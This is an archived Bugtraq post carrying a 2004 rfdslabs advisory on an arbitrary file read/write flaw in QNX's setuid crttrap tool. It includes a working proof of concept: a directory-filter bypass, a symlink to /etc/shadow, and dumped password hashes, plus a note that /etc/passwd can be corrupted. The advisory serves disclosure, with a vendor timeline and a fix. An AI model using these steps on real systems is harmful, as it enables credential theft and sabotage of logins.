Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]

from [Julio Cesar Fort] Network Security [Permanent Link]
Subject: QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]
Date: 29 Dec 2004 02:30:59 -0000 


                *** rfdslabs security advisory ***

Title: QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]
Versions: QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
Vendor: http://www.qnx.com
Date: Dec 11 2004

Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>

1. Introduction

   crrtrap is a tool to detect video hardware and starts the correct driver for 
QNX.


2. Details

   crttrap has a '-c' flag to specify where trap file will be written. Combined 
with 'trap' flag it is possible to read/write any file in the disk.

By default crttrap writes and read trap files in "/etc/system/config". Once 
this directory is owned by root we don't have permission to write. It filters 
"../" to prevent directory transversal vulnerabilities. In order to bypass this 
protection we noticed it doesn't check only for "/".
This way is possible to make it create a sub directory, giving our group read 
and write priviledges. Now we are able to manipulate our trap file.

$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
total 52
drwxrwxr-x    2 root 100         2048 Dec 11 12:40 .
drwxrwxr-x    3 root root        2048 Dec 11 12:35 ..
-rw-r--r--    1 root 100        21671 Dec 11 12:40 rfdslabs

$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
root:21QjUKxP9gEJK:0:0:0
sandimas:91UzHxvt3x1n2:0:0:0

We are also able to overwrite any file with 'trap' switch. As an example, an 
attacker can corrupt  '/etc/passwd' and make login attempts fail everytime.
See www.rfdslabs.com.br for another file deletion vulnerability in crttrap.

PS: In 31 May 2002, Simon Oullette had found a bug in crttrap '-c' flag in QNX 
4.25. But his exploitation technique won't work with newest versions because 
crttrap opens "/etc/system/config" and its subdirectories.


3. Solution

   No official solution yet. We suggest remove crttrap suid bit until QNX don't 
release a patch.


4. Timeline

10 Dec 2004: Vulnerability detected;
11 Dec 2004: Advisory written; rfdslabs contacts QNX;
20 Dec 2004: QNX replies back rfdslabs;
28 Dec 2004: Advisory released to public.

Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
Rodrigo Costa (NERV).

www.rfdslabs.com.br - computers, sex, human mind, music and more
Recife, PE, Brazil
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004], Julio Cesar Fort <=
Previous by Date:  Re: [Full-Disclosure] Re: New Santy-Worm attacks *all* PHP-skripts, Paul Laudanski
Next by Date:  Sanity Worm Concepts, Andy Fewtrell
Previous by Thread:  [Full-Disclosure] [USN-53-1] imlib vulnerabilities, Martin Pitt
Next by Thread:  Sanity Worm Concepts, Andy Fewtrell
Indexes:  [Date] [Thread] [Top] [All Lists]